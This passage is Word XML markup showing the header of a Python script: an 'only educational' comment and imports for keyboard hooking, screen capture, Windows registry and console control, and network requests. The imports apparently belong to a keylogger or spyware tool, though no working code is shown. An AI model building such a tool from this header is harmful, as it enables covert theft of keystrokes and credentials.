    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="382" w:name="l35"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">35   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="382"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   Its purpose is only educational.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="l36"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">36   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># -----------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="384" w:name="l37"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">37   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="384"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="385" w:name="l38"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">38   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="385"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="386" w:name="l39"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">39   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="386"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">config_gm </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="387" w:name="l40"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">40   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="387"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>argparse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="l41"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">41   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="l42"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">42   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="l43"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">43   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>getpass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="l44"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">44   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>glob</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="l45"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">45   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="l46"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">46   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="l47"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">47   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="l48"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">48   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="l49"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">49   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="397" w:name="l50"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">50   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="397"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pynput </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="398" w:name="l51"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">51   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="398"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pythoncom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="l52"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">52   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pyWinhook </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pyHook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="l53"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">53   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="l54"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">54   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="l55"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">55   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="l56"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">56   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>tempfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="l57"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">57   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>threading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="l58"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">58   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>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parse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="l59"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">59   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>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request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="l60"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">60   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>win32console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="408" w:name="l61"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">61   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="408"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>win32gui</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="l62"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">62   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>winreg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="l63"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">63   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="l64"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">64   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="l65"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
